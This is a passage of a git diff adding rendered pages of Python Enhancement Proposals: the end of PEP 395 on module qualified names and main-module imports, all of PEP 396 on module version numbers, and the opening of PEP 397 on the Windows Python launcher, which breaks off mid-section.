To get around the lack of os.fork on Windows, the multiprocessing +module attempts to re-execute Python with the same main module, but skipping +over any code guarded by if __name__ == "__main__": checks. It does the +best it can with the information it has, but is forced to make assumptions +that simply aren’t valid whenever the main module isn’t an ordinary directly +executed script or top-level module. Packages and non-top-level modules +executed via the -m switch, as well as directly executed zipfiles or +directories, are likely to make multiprocessing on Windows do the wrong thing +(either quietly or noisily, depending on application details) when spawning a +new process.

+

While this issue currently only affects Windows directly, it also impacts +any proposals to provide Windows-style “clean process” invocation via the +multiprocessing module on other platforms.

+
+
+
+

Qualified Names for Modules

+

To make it feasible to fix these problems once and for all, it is proposed +to add a new module level attribute: __qualname__. This abbreviation of +“qualified name” is taken from PEP 3155, where it is used to store the naming +path to a nested class or function definition relative to the top level +module.

+

For modules, __qualname__ will normally be the same as __name__, just +as it is for top-level functions and classes in PEP 3155. However, it will +differ in some situations so that the above problems can be addressed.

+

Specifically, whenever __name__ is modified for some other purpose (such +as to denote the main module), then __qualname__ will remain unchanged, +allowing code that needs it to access the original unmodified value.

+

If a module loader does not initialise __qualname__ itself, then the +import system will add it automatically (setting it to the same value as +__name__).

+
+

Alternative Names

+

Two alternative names were also considered for the new attribute: “full name” +(__fullname__) and “implementation name” (__implname__).

+

Either of those would actually be valid for the use case in this PEP. +However, as a meta-issue, PEP 3155 is also adding a new attribute (for +functions and classes) that is “like __name__, but different in some cases +where __name__ is missing necessary information” and those terms aren’t +accurate for the PEP 3155 function and class use case.

+

PEP 3155 deliberately omits the module information, so the term “full name” +is simply untrue, and “implementation name” implies that it may specify an +object other than that specified by __name__, and that is never the +case for PEP 3155 (in that PEP, __name__ and __qualname__ always +refer to the same function or class, it’s just that __name__ is +insufficient to accurately identify nested functions and classes).

+

Since it seems needlessly inconsistent to add two new terms for attributes +that only exist because backwards compatibility concerns keep us from +changing the behaviour of __name__ itself, this PEP instead chose to +adopt the PEP 3155 terminology.

+

If the relative inscrutability of “qualified name” and __qualname__ +encourages interested developers to look them up at least once rather than +assuming they know what they mean just from the name and guessing wrong, +that’s not necessarily a bad outcome.

+

Besides, 99% of Python developers should never need to even care these extra +attributes exist - they’re really an implementation detail to let us fix a +few problematic behaviours exhibited by imports, pickling and introspection, +not something people are going to be dealing with on a regular basis.

+
+
+
+

Eliminating the Traps

+

The following changes are interrelated and make the most sense when +considered together. They collectively either completely eliminate the traps +for the unwary noted above, or else provide straightforward mechanisms for +dealing with them.

+

A rough draft of some of the concepts presented here was first posted on the +python-ideas list ([1]), but they have evolved considerably since first being +discussed in that thread. Further discussion has subsequently taken place on +the import-sig mailing list ([2]. [3]).

+
+

Fixing main module imports inside packages

+

To eliminate this trap, it is proposed that an additional filesystem check be +performed when determining a suitable value for sys.path[0]. This check +will look for Python’s explicit package directory markers and use them to find +the appropriate directory to add to sys.path.

+

The current algorithm for setting sys.path[0] in relevant cases is roughly +as follows:

+
# Interactive prompt, -m switch, -c switch
+sys.path.insert(0, '')
+
+
+
# Valid sys.path entry execution (i.e. directory and zip execution)
+sys.path.insert(0, sys.argv[0])
+
+
+
# Direct script execution
+sys.path.insert(0, os.path.dirname(sys.argv[0]))
+
+
+

It is proposed that this initialisation process be modified to take +package details stored on the filesystem into account:

+
# Interactive prompt, -m switch, -c switch
+in_package, path_entry, _ignored = split_path_module(os.getcwd(), '')
+if in_package:
+    sys.path.insert(0, path_entry)
+else:
+    sys.path.insert(0, '')
+
+# Start interactive prompt or run -c command as usual
+#   __main__.__qualname__ is set to "__main__"
+
+# The -m switches uses the same sys.path[0] calculation, but:
+#   modname is the argument to the -m switch
+#   modname is passed to ``runpy._run_module_as_main()`` as usual
+#   __main__.__qualname__ is set to modname
+
+
+
# Valid sys.path entry execution (i.e. directory and zip execution)
+modname = "__main__"
+path_entry, modname = split_path_module(sys.argv[0], modname)
+sys.path.insert(0, path_entry)
+
+# modname (possibly adjusted) is passed to ``runpy._run_module_as_main()``
+# __main__.__qualname__ is set to modname
+
+
+
# Direct script execution
+in_package, path_entry, modname = split_path_module(sys.argv[0])
+sys.path.insert(0, path_entry)
+if in_package:
+    # Pass modname to ``runpy._run_module_as_main()``
+else:
+    # Run script directly
+# __main__.__qualname__ is set to modname
+
+
+

The split_path_module() supporting function used in the above pseudo-code +would have the following semantics:

+
def _splitmodname(fspath):
+    path_entry, fname = os.path.split(fspath)
+    modname = os.path.splitext(fname)[0]
+    return path_entry, modname
+
+def _is_package_dir(fspath):
+    return any(os.exists("__init__" + info[0]) for info
+                   in imp.get_suffixes())
+
+def split_path_module(fspath, modname=None):
+    """Given a filesystem path and a relative module name, determine an
+       appropriate sys.path entry and a fully qualified module name.
+
+       Returns a 3-tuple of (package_depth, fspath, modname). A reported
+       package depth of 0 indicates that this would be a top level import.
+
+       If no relative module name is given, it is derived from the final
+       component in the supplied path with the extension stripped.
+    """
+    if modname is None:
+        fspath, modname = _splitmodname(fspath)
+    package_depth = 0
+    while _is_package_dir(fspath):
+        fspath, pkg = _splitmodname(fspath)
+        modname = pkg + '.' + modname
+    return package_depth, fspath, modname
+
+
+

This PEP also proposes that the split_path_module() functionality be +exposed directly to Python users via the runpy module.

+

With this fix in place, and the same simple package layout described earlier, +all of the following commands would invoke the test suite correctly:

+
# working directory: project/example/tests
+./test_foo.py
+python test_foo.py
+python -m package.tests.test_foo
+python -c "from .test_foo import main; main()"
+python -c "from ..tests.test_foo import main; main()"
+python -c "from package.tests.test_foo import main; main()"
+
+# working directory: project/package
+tests/test_foo.py
+python tests/test_foo.py
+python -m package.tests.test_foo
+python -c "from .tests.test_foo import main; main()"
+python -c "from package.tests.test_foo import main; main()"
+
+# working directory: project
+example/tests/test_foo.py
+python example/tests/test_foo.py
+python -m package.tests.test_foo
+python -c "from package.tests.test_foo import main; main()"
+
+# working directory: project/..
+project/example/tests/test_foo.py
+python project/example/tests/test_foo.py
+# The -m and -c approaches still don't work from here, but the failure
+# to find 'package' correctly is pretty easy to explain in this case
+
+
+

With these changes, clicking Python modules in a graphical file browser +should always execute them correctly, even if they live inside a package. +Depending on the details of how it invokes the script, Idle would likely also +be able to run test_foo.py correctly with F5, without needing any Idle +specific fixes.

+
+

Optional addition: command line relative imports

+

With the above changes in place, it would be a fairly minor addition to allow +explicit relative imports as arguments to the -m switch:

+
# working directory: project/example/tests
+python -m .test_foo
+python -m ..tests.test_foo
+
+# working directory: project/example/
+python -m .tests.test_foo
+
+
+

With this addition, system initialisation for the -m switch would change +as follows:

+
# -m switch (permitting explicit relative imports)
+in_package, path_entry, pkg_name = split_path_module(os.getcwd(), '')
+qualname= <<arguments to -m switch>>
+if qualname.startswith('.'):
+    modname = qualname
+    while modname.startswith('.'):
+        modname = modname[1:]
+        pkg_name, sep, _ignored = pkg_name.rpartition('.')
+        if not sep:
+            raise ImportError("Attempted relative import beyond top level package")
+    qualname = pkg_name + '.' modname
+if in_package:
+    sys.path.insert(0, path_entry)
+else:
+    sys.path.insert(0, '')
+
+# qualname is passed to ``runpy._run_module_as_main()``
+# _main__.__qualname__ is set to qualname
+
+
+
+
+

Compatibility with PEP 382

+

Making this proposal compatible with the PEP 382 namespace packaging PEP is +trivial. The semantics of _is_package_dir() are merely changed to be:

+
def _is_package_dir(fspath):
+    return (fspath.endswith(".pyp") or
+            any(os.exists("__init__" + info[0]) for info
+                    in imp.get_suffixes()))
+
+
+
+
+

Incompatibility with PEP 402

+

PEP 402 proposes the elimination of explicit markers in the file system for +Python packages. This fundamentally breaks the proposed concept of being able +to take a filesystem path and a Python module name and work out an unambiguous +mapping to the Python module namespace. Instead, the appropriate mapping +would depend on the current values in sys.path, rendering it impossible +to ever fix the problems described above with the calculation of +sys.path[0] when the interpreter is initialised.

+

While some aspects of this PEP could probably be salvaged if PEP 402 were +adopted, the core concept of making import semantics from main and other +modules more consistent would no longer be feasible.

+

This incompatibility is discussed in more detail in the relevant import-sig +threads ([2], [3]).

+
+
+

Potential incompatibilities with scripts stored in packages

+

The proposed change to sys.path[0] initialisation may break some +existing code. Specifically, it will break scripts stored in package +directories that rely on the implicit relative imports from __main__ in +order to run correctly under Python 3.

+

While such scripts could be imported in Python 2 (due to implicit relative +imports) it is already the case that they cannot be imported in Python 3, +as implicit relative imports are no longer permitted when a module is +imported.

+

By disallowing implicit relatives imports from the main module as well, +such modules won’t even work as scripts with this PEP. Switching them +over to explicit relative imports will then get them working again as +both executable scripts and as importable modules.

+

To support earlier versions of Python, a script could be written to use +different forms of import based on the Python version:

+
if __name__ == "__main__" and sys.version_info < (3, 3):
+    import peer # Implicit relative import
+else:
+    from . import peer # explicit relative import
+
+
+
+
+
+

Fixing dual imports of the main module

+

Given the above proposal to get __qualname__ consistently set correctly +in the main module, one simple change is proposed to eliminate the problem +of dual imports of the main module: the addition of a sys.metapath hook +that detects attempts to import __main__ under its real name and returns +the original main module instead:

+
class AliasImporter:
+  def __init__(self, module, alias):
+      self.module = module
+      self.alias = alias
+
+  def __repr__(self):
+      fmt = "{0.__class__.__name__}({0.module.__name__}, {0.alias})"
+      return fmt.format(self)
+
+  def find_module(self, fullname, path=None):
+      if path is None and fullname == self.alias:
+          return self
+      return None
+
+  def load_module(self, fullname):
+      if fullname != self.alias:
+          raise ImportError("{!r} cannot load {!r}".format(self, fullname))
+      return self.main_module
+
+
+

This metapath hook would be added automatically during import system +initialisation based on the following logic:

+
main = sys.modules["__main__"]
+if main.__name__ != main.__qualname__:
+    sys.metapath.append(AliasImporter(main, main.__qualname__))
+
+
+

This is probably the least important proposal in the PEP - it just +closes off the last mechanism that is likely to lead to module duplication +after the configuration of sys.path[0] at interpreter startup is +addressed.

+
+
+

Fixing pickling without breaking introspection

+

To fix this problem, it is proposed to make use of the new module level +__qualname__ attributes to determine the real module location when +__name__ has been modified for any reason.

+

In the main module, __qualname__ will automatically be set to the main +module’s “real” name (as described above) by the interpreter.

+

Pseudo-modules that adjust __name__ to point to the public namespace will +leave __qualname__ untouched, so the implementation location remains readily +accessible for introspection.

+

If __name__ is adjusted at the top of a module, then this will +automatically adjust the __module__ attribute for all functions and +classes subsequently defined in that module.

+

Since multiple submodules may be set to use the same “public” namespace, +functions and classes will be given a new __qualmodule__ attribute +that refers to the __qualname__ of their module.

+

This isn’t strictly necessary for functions (you could find out their +module’s qualified name by looking in their globals dictionary), but it is +needed for classes, since they don’t hold a reference to the globals of +their defining module. Once a new attribute is added to classes, it is +more convenient to keep the API consistent and add a new attribute to +functions as well.

+

These changes mean that adjusting __name__ (and, either directly or +indirectly, the corresponding function and class __module__ attributes) +becomes the officially sanctioned way to implement a namespace as a package, +while exposing the API as if it were still a single module.

+

All serialisation code that currently uses __name__ and __module__ +attributes will then avoid exposing implementation details by default.

+

To correctly handle serialisation of items from the main module, the class +and function definition logic will be updated to also use __qualname__ +for the __module__ attribute in the case where __name__ == "__main__".

+

With __name__ and __module__ being officially blessed as being used +for the public names of things, the introspection tools in the standard +library will be updated to use __qualname__ and __qualmodule__ +where appropriate. For example:

+
    +
  • pydoc will report both public and qualified names for modules
  • +
  • inspect.getsource() (and similar tools) will use the qualified names +that point to the implementation of the code
  • +
  • additional pydoc and/or inspect APIs may be provided that report +all modules with a given public __name__.
  • +
+
+
+

Fixing multiprocessing on Windows

+

With __qualname__ now available to tell multiprocessing the real +name of the main module, it will be able to simply include it in the +serialised information passed to the child process, eliminating the +need for the current dubious introspection of the __file__ attribute.

+

For older Python versions, multiprocessing could be improved by applying +the split_path_module() algorithm described above when attempting to +work out how to execute the main module based on its __file__ attribute.

+
+
+
+

Explicit relative imports

+

This PEP proposes that __package__ be unconditionally defined in the +main module as __qualname__.rpartition('.')[0]. Aside from that, it +proposes that the behaviour of explicit relative imports be left alone.

+

In particular, if __package__ is not set in a module when an explicit +relative import occurs, the automatically cached value will continue to be +derived from __name__ rather than __qualname__. This minimises any +backwards incompatibilities with existing code that deliberately manipulates +relative imports by adjusting __name__ rather than setting __package__ +directly.

+

This PEP does not propose that __package__ be deprecated. While it is +technically redundant following the introduction of __qualname__, it just +isn’t worth the hassle of deprecating it within the lifetime of Python 3.x.

+
+
+

Reference Implementation

+

None as yet.

+
+
+

References

+ + +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0395.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0396/index.html b/pep-0396/index.html new file mode 100644 index 00000000000..44a4c0c3184 --- /dev/null +++ b/pep-0396/index.html @@ -0,0 +1,436 @@ + + + + + + + + PEP 396 – Module Version Numbers | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 396 – Module Version Numbers

+
+
Author:
+
Barry Warsaw <barry at python.org>
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
16-Mar-2011
+
Post-History:
+
05-Apr-2011
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP has been withdrawn.

+

×

+

Refer to Accessing version information at runtime and +Single-sourcing the Project Version in the Python +Packaging User Guide for up to date recommendations on +accessing package version information at runtime, +and on defining runtime __version__ attributes which are +automatically kept consistent with package distribution metadata

+

+
+
+

Abstract

+

Given that it is useful and common to specify version numbers for +Python modules, and given that different ways of doing this have grown +organically within the Python community, it is useful to establish +standard conventions for module authors to adhere to and reference. +This informational PEP describes best practices for Python module +authors who want to define the version number of their Python module.

+

Conformance with this PEP is optional, however other Python tools +(such as distutils2 [1]) may be adapted to use the conventions +defined here.

+
+
+

PEP Rejection/Withdrawal

+

This PEP was formally rejected on 2021-04-14. The packaging ecosystem +has changed significantly in the intervening years since this PEP was +first written, and APIs such as importlib.metadata.version() [11] +provide for a much better experience.

+

This rejection was reclassified as a withdrawal on 2024-10-21, +as the previous state was being misinterpreted [12] as suggesting +that no modules should be defining __version__ attributes, +which definitely isn’t the case.

+

Modules are still free to define __version__ if they choose to. +However, choosing not to do so won’t interfere with looking up +the version information for installed distribution packages, so an +Informational PEP isn’t the right tool to document community +conventions around the use of module __version__ attributes +(they’re better covered as part of the Python Packaging User Guide).

+
+
+

User Stories

+

Alice is writing a new module, called alice, which she wants to +share with other Python developers. alice is a simple module and +lives in one file, alice.py. Alice wants to specify a version +number so that her users can tell which version they are using. +Because her module lives entirely in one file, she wants to add the +version number to that file.

+

Bob has written a module called bob which he has shared with many +users. bob.py contains a version number for the convenience of +his users. Bob learns about the Cheeseshop [2], and adds some simple +packaging using classic distutils so that he can upload The Bob +Bundle to the Cheeseshop. Because bob.py already specifies a +version number which his users can access programmatically, he wants +the same API to continue to work even though his users now get it from +the Cheeseshop.

+

Carol maintains several namespace packages, each of which are +independently developed and distributed. In order for her users to +properly specify dependencies on the right versions of her packages, +she specifies the version numbers in the namespace package’s +setup.py file. Because Carol wants to have to update one version +number per package, she specifies the version number in her module and +has the setup.py extract the module version number when she builds +the sdist archive.

+

David maintains a package in the standard library, and also produces +standalone versions for other versions of Python. The standard +library copy defines the version number in the module, and this same +version number is used for the standalone distributions as well.

+
+
+

Rationale

+

Python modules, both in the standard library and available from third +parties, have long included version numbers. There are established +de facto standards for describing version numbers, and many ad-hoc +ways have grown organically over the years. Often, version numbers +can be retrieved from a module programmatically, by importing the +module and inspecting an attribute. Classic Python distutils +setup() functions [3] describe a version argument where the +release’s version number can be specified. PEP 8 describes the +use of a module attribute called __version__ for recording +“Subversion, CVS, or RCS” version strings using keyword expansion. In +the PEP author’s own email archives, the earliest example of the use +of an __version__ module attribute by independent module +developers dates back to 1995.

+

Another example of version information is the sqlite3 [5] module +with its sqlite_version_info, version, and version_info +attributes. It may not be immediately obvious which attribute +contains a version number for the module, and which contains a version +number for the underlying SQLite3 library.

+

This informational PEP codifies established practice, and recommends +standard ways of describing module version numbers, along with some +use cases for when – and when not – to include them. Its adoption +by module authors is purely voluntary; packaging tools in the standard +library will provide optional support for the standards defined +herein, and other tools in the Python universe may comply as well.

+
+
+

Specification

+
    +
  1. In general, modules in the standard library SHOULD NOT have version +numbers. They implicitly carry the version number of the Python +release they are included in.
  2. +
  3. On a case-by-case basis, standard library modules which are also +released in standalone form for other Python versions MAY include a +module version number when included in the standard library, and +SHOULD include a version number when packaged separately.
  4. +
  5. When a module (or package) includes a version number, the version +SHOULD be available in the __version__ attribute.
  6. +
  7. For modules which live inside a namespace package, the module +SHOULD include the __version__ attribute. The namespace +package itself SHOULD NOT include its own __version__ +attribute.
  8. +
  9. The __version__ attribute’s value SHOULD be a string.
  10. +
  11. Module version numbers SHOULD conform to the normalized version +format specified in PEP 386.
  12. +
  13. Module version numbers SHOULD NOT contain version control system +supplied revision numbers, or any other semantically different +version numbers (e.g. underlying library version number).
  14. +
  15. The version attribute in a classic distutils setup.py +file, or the PEP 345 Version metadata field SHOULD be +derived from the __version__ field, or vice versa.
  16. +
+
+
+

Examples

+

Retrieving the version number from a third party package:

+
>>> import bzrlib
+>>> bzrlib.__version__
+'2.3.0'
+
+
+

Retrieving the version number from a standard library package that is +also distributed as a standalone module:

+
>>> import email
+>>> email.__version__
+'5.1.0'
+
+
+

Version numbers for namespace packages:

+
>>> import flufl.i18n
+>>> import flufl.enum
+>>> import flufl.lock
+
+>>> print flufl.i18n.__version__
+1.0.4
+>>> print flufl.enum.__version__
+3.1
+>>> print flufl.lock.__version__
+2.1
+
+>>> import flufl
+>>> flufl.__version__
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+AttributeError: 'module' object has no attribute '__version__'
+>>>
+
+
+
+
+

Deriving

+

Module version numbers can appear in at least two places, and +sometimes more. For example, in accordance with this PEP, they are +available programmatically on the module’s __version__ attribute. +In a classic distutils setup.py file, the setup() function +takes a version argument, while the distutils2 setup.cfg file +has a version key. The version number must also get into the PEP +345 metadata, preferably when the sdist archive is built. It’s +desirable for module authors to only have to specify the version +number once, and have all the other uses derive from this single +definition.

+

This could be done in any number of ways, a few of which are outlined +below. These are included for illustrative purposes only and are not +intended to be definitive, complete, or all-encompassing. Other +approaches are possible, and some included below may have limitations +that prevent their use in some situations.

+

Let’s say Elle adds this attribute to her module file elle.py:

+
__version__ = '3.1.1'
+
+
+
+

Classic distutils

+

In classic distutils, the simplest way to add the version string to +the setup() function in setup.py is to do something like +this:

+
from elle import __version__
+setup(name='elle', version=__version__)
+
+
+

In the PEP author’s experience however, this can fail in some cases, +such as when the module uses automatic Python 3 conversion via the +2to3 program (because setup.py is executed by Python 3 before +the elle module has been converted).

+

In that case, it’s not much more difficult to write a little code to +parse the __version__ from the file rather than importing it. +Without providing too much detail, it’s likely that modules such as +distutils2 will provide a way to parse version strings from files. +E.g.:

+
from distutils2 import get_version
+setup(name='elle', version=get_version('elle.py'))
+
+
+
+
+

Distutils2

+

Because the distutils2 style setup.cfg is declarative, we can’t +run any code to extract the __version__ attribute, either via +import or via parsing.

+

In consultation with the distutils-sig [9], two options are +proposed. Both entail containing the version number in a file, and +declaring that file in the setup.cfg. When the entire contents of +the file contains the version number, the version-file key will be +used:

+
[metadata]
+version-file: version.txt
+
+
+

When the version number is contained within a larger file, e.g. of +Python code, such that the file must be parsed to extract the version, +the key version-from-file will be used:

+
[metadata]
+version-from-file: elle.py
+
+
+

A parsing method similar to that described above will be performed on +the file named after the colon. The exact recipe for doing this will +be discussed in the appropriate distutils2 development forum.

+

An alternative is to only define the version number in setup.cfg +and use the pkgutil module [8] to make it available +programmatically. E.g. in elle.py:

+
from distutils2._backport import pkgutil
+__version__ = pkgutil.get_distribution('elle').metadata['version']
+
+
+
+
+
+

PEP 376 metadata

+

PEP 376 defines a standard for static metadata, but doesn’t +describe the process by which this metadata gets created. It is +highly desirable for the derived version information to be placed into +the PEP 376 .dist-info metadata at build-time rather than +install-time. This way, the metadata will be available for +introspection even when the code is not installed.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0396.rst

+

Last modified: 2024-10-23 14:52:37 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0397/index.html b/pep-0397/index.html new file mode 100644 index 00000000000..5b9c71251ca --- /dev/null +++ b/pep-0397/index.html @@ -0,0 +1,521 @@ + + + + + + + + PEP 397 – Python launcher for Windows | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 397 – Python launcher for Windows

+
+
Author:
+
Mark Hammond <mhammond at skippinet.com.au>, +Martin von Löwis <martin at v.loewis.de>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Mar-2011
+
Python-Version:
+
3.3
+
Post-History:
+
21-Jul-2011, 17-May-2011, 15-Mar-2011
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a Python launcher for the Windows platform. A +Python launcher is a single executable which uses a number of +heuristics to locate a Python executable and launch it with a +specified command line.

+
+
+

Rationale

+

Windows provides “file associations” so an executable can be associated +with an extension, allowing for scripts to be executed directly in some +contexts (eg., double-clicking the file in Windows Explorer.) Until now, +a strategy of “last installed Python wins” has been used and while not +ideal, has generally been workable due to the conservative changes in +Python 2.x releases. As Python 3.x scripts are often syntactically +incompatible with Python 2.x scripts, a different strategy must be used +to allow files with a ‘.py’ extension to use a different executable based +on the Python version the script targets. This will be done by borrowing +the existing practices of another operating system - scripts will be able +to nominate the version of Python they need by way of a “shebang” line, as +described below.

+

Unix-like operating systems (referred to simply as “Unix” in this +PEP) allow scripts to be executed as if they were executable images +by examining the script for a “shebang” line which specifies the +actual executable to be used to run the script. This is described in +detail in the evecve(2) man page [1] and while user documentation will +be created for this feature, for the purposes of this PEP that man +page describes a valid shebang line.

+

Additionally, these operating systems provide symbolic-links to +Python executables in well-known directories. For example, many +systems will have a link /usr/bin/python which references a +particular version of Python installed under the operating-system. +These symbolic links allow Python to be executed without regard for +where Python it actually installed on the machine (eg., without +requiring the path where Python is actually installed to be +referenced in the shebang line or in the PATH.) PEP 394 ‘The “python” +command on Unix-Like Systems’ describes additional conventions +for more fine-grained specification of a particular Python version.

+

These 2 facilities combined allow for a portable and somewhat +predictable way of both starting Python interactively and for allowing +Python scripts to execute. This PEP describes an implementation of a +launcher which can offer the same benefits for Python on the Windows +platform and therefore allows the launcher to be the executable +associated with ‘.py’ files to support multiple Python versions +concurrently.

+

While this PEP offers the ability to use a shebang line which should +work on both Windows and Unix, this is not the primary motivation for +this PEP - the primary motivation is to allow a specific version to be +specified without inventing new syntax or conventions to describe +it.

+
+
+

Specification

+

This PEP specifies features of the launcher; a prototype +implementation is provided in [3] which will be distributed +together with the Windows installer of Python, but will also be +available separately (but released along with the Python +installer). New features may be added to the launcher as +long as the features prescribed here continue to work.

+
+

Installation

+

The launcher comes in 2 versions - one which is a console program and +one which is a “windows” (ie., GUI) program. These 2 launchers correspond +to the ‘python.exe’ and ‘pythonw.exe’ executables which currently ship +with Python. The console launcher will be named ‘py.exe’ and the Windows +one named ‘pyw.exe’. The “windows” (ie., GUI) version of the launcher +will attempt to locate and launch pythonw.exe even if a virtual shebang +line nominates simply “python” - in fact, the trailing ‘w’ notation is +not supported in the virtual shebang line at all.

+

The launcher is installed into the Windows directory (see +discussion below) if installed by a privileged user. The +stand-alone installer asks for an alternative location of the +installer, and adds that location to the user’s PATH.

+

The installation in the Windows directory is a 32-bit executable +(see discussion); the standalone installer may also offer to install +64-bit versions of the launcher.

+

The launcher installation is registered in +HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\SharedDLLs +with a reference counter. +It contains a version resource matching the version number of the +pythonXY.dll with which it is distributed. Independent +installations will overwrite older version +of the launcher with newer versions. Stand-alone releases use +a release level of 0x10 in FIELD3 of the CPython release on which +they are based.

+

Once installed, the “console” version of the launcher is +associated with .py files and the “windows” version associated with .pyw +files.

+

The launcher is not tied to a specific version of Python - eg., a +launcher distributed with Python 3.3 should be capable of locating and +executing any Python 2.x and Python 3.x version. However, the +launcher binaries have a version resource that is the same as the +version resource in the Python binaries that they are released with.

+
+
+

Python Script Launching

+

The launcher is restricted to launching Python scripts. +It is not intended as a general-purpose script launcher or +shebang processor.

+

The launcher supports the syntax of shebang lines as described +in [1], including all restrictions listed.

+

The launcher supports shebang lines referring to Python +executables with any of the (regex) prefixes “/usr/bin/”, “/usr/local/bin” +and “/usr/bin/env *”, as well as binaries specified without

+

For example, a shebang line of ‘#! /usr/bin/python’ should work even +though there is unlikely to be an executable in the relative Windows +directory “\usr\bin”. This means that many scripts can use a single +shebang line and be likely to work on both Unix and Windows without +modification.

+

The launcher will support fully-qualified paths to executables. +While this will make the script inherently non-portable, it is a +feature offered by Unix and would be useful for Windows users in +some cases.

+

The launcher will be capable of supporting implementations other than +CPython, such as jython and IronPython, but given both the absence of +common links on Unix (such as “/usr/bin/jython”) and the inability for the +launcher to automatically locate the installation location of these +implementations on Windows, the launcher will support this via +customization options. Scripts taking advantage of this will not be +portable (as these customization options must be set to reflect the +configuration of the machine on which the launcher is running) but this +ability is nonetheless considered worthwhile.

+

On Unix, the user can control which specific version of Python is used +by adjusting the links in /usr/bin to point to the desired version. As +the launcher on Windows will not use Windows links, customization options +(exposed via both environment variables and INI files) will be used to +override the semantics for determining what version of Python will be +used. For example, while a shebang line of “/usr/bin/python2” will +automatically locate a Python 2.x implementation, an environment variable +can override exactly which Python 2.x implementation will be chosen. +Similarly for “/usr/bin/python” and “/usr/bin/python3”. This is +specified in detail later in this PEP.

+
+
+

Shebang line parsing

+

If the first command-line argument does not start with a dash (‘-‘) +character, an attempt will be made to open that argument as a file +and parsed for a shebang line according to the rules in [1]:

+
#! interpreter [optional-arg]
+
+
+

Once parsed, the command will be categorized according to the following rules:

+
    +
  • If the command starts with the definition of a customized command +followed by a whitespace character (including a newline), the customized +command will be used. See below for a description of customized +commands.
  • +
  • The launcher will define a set of prefixes which are considered Unix +compatible commands to launch Python, namely “/usr/bin/python”, +“/usr/local/bin/python”, “/usr/bin/env python”, and “python”. +If a command starts with one of these strings will be treated as a +‘virtual command’ and the rules described in Python Version Qualifiers +(below) will be used to locate the executable to use.
  • +
  • Otherwise the command is assumed to be directly ready to execute - ie. +a fully-qualified path (or a reference to an executable on the PATH) +optionally followed by arguments. The contents of the string will not +be parsed - it will be passed directly to the Windows CreateProcess +function after appending the name of the script and the launcher +command-line arguments. This means that the rules used by +CreateProcess will be used, including how relative path names and +executable references without extensions are treated. Notably, the +Windows command processor will not be used, so special rules used by the +command processor (such as automatic appending of extensions other than +‘.exe’, support for batch files, etc) will not be used.
  • +
+

The use of ‘virtual’ shebang lines is encouraged as this should +allow for portable shebang lines to be specified which work on +multiple operating systems and different installations of the same +operating system.

+

If the first argument can not be opened as a file or if no valid +shebang line can be found, the launcher will act as if a shebang line of +‘#!python’ was found - ie., a default Python interpreter will be +located and the arguments passed to that. However, if a valid +shebang line is found but the process specified by that line can not +be started, the default interpreter will not be started - the error +to create the specified child process will cause the launcher to display +an appropriate message and terminate with a specific exit code.

+
+
+

Configuration file

+

Two .ini files will be searched by the launcher - py.ini in the +current user’s “application data” directory (i.e. the directory returned +by calling the Windows function SHGetFolderPath with CSIDL_LOCAL_APPDATA, +%USERPROFILE%\AppData\Local on Vista+, +%USERPROFILE%\Local Settings\Application Data on XP) +and py.ini in the same directory as the launcher. The same .ini +files are used for both the ‘console’ version of the launcher (i.e. +py.exe) and for the ‘windows’ version (i.e. pyw.exe)

+

Customization specified in the “application directory” will have +precedence over the one next to the executable, so a user, who may not +have write access to the .ini file next to the launcher, can override +commands in that global .ini file)

+
+
+

Virtual commands in shebang lines

+

Virtual Commands are shebang lines which start with strings which would +be expected to work on Unix platforms - examples include +‘/usr/bin/python’, ‘/usr/bin/env python’ and ‘python’. Optionally, the +virtual command may be suffixed with a version qualifier (see below), +such as ‘/usr/bin/python2’ or ‘/usr/bin/python3.2’. The command executed +is based on the rules described in Python Version Qualifiers +below.

+
+
+

Customized Commands

+

The launcher will support the ability to define “Customized Commands” in a +Windows .ini file (ie, a file which can be parsed by the Windows function +GetPrivateProfileString). A section called ‘[commands]’ can be created +with key names defining the virtual command and the value specifying the +actual command-line to be used for this virtual command.

+

For example, if an INI file has the contents:

+
[commands]
+vpython=c:\bin\vpython.exe -foo
+
+
+

Then a shebang line of ‘#! vpython’ in a script named ‘doit.py’ will +result in the launcher using the command-line +c:\bin\vpython.exe -foo doit.py

+

The precise details about the names, locations and search order of the +.ini files is in the launcher documentation [4]

+
+
+

Python Version Qualifiers

+

Some of the features described allow an optional Python version qualifier +to be used.

+

A version qualifier starts with a major version number and can optionally +be followed by a period (‘.’) and a minor version specifier. If the minor +qualifier is specified, it may optionally be followed by “-32” to indicate +the 32bit implementation of that version be used. Note that no “-64” +qualifier is necessary as this is the default implementation (see below).

+

On 64bit Windows with both 32bit and 64bit implementations of the +same (major.minor) Python version installed, the 64bit version will +always be preferred. This will be true for both 32bit and 64bit +implementations of the launcher - a 32bit launcher will prefer to +execute a 64bit Python installation of the specified version if +available. This is so the behavior of the launcher can be predicted +knowing only what versions are installed on the PC and without +regard to the order in which they were installed (ie, without knowing +whether a 32 or 64bit version of Python and corresponding launcher was +installed last). As noted above, an optional “-32” suffix can be used +on a version specifier to change this behaviour.

+

If no version qualifiers are found in a command, the environment variable +PY_PYTHON can be set to specify the default version qualifier - the default +value is “2”. Note this value could specify just a major version (e.g. “2”) or +a major.minor qualifier (e.g. “2.6”), or even major.minor-32.

+

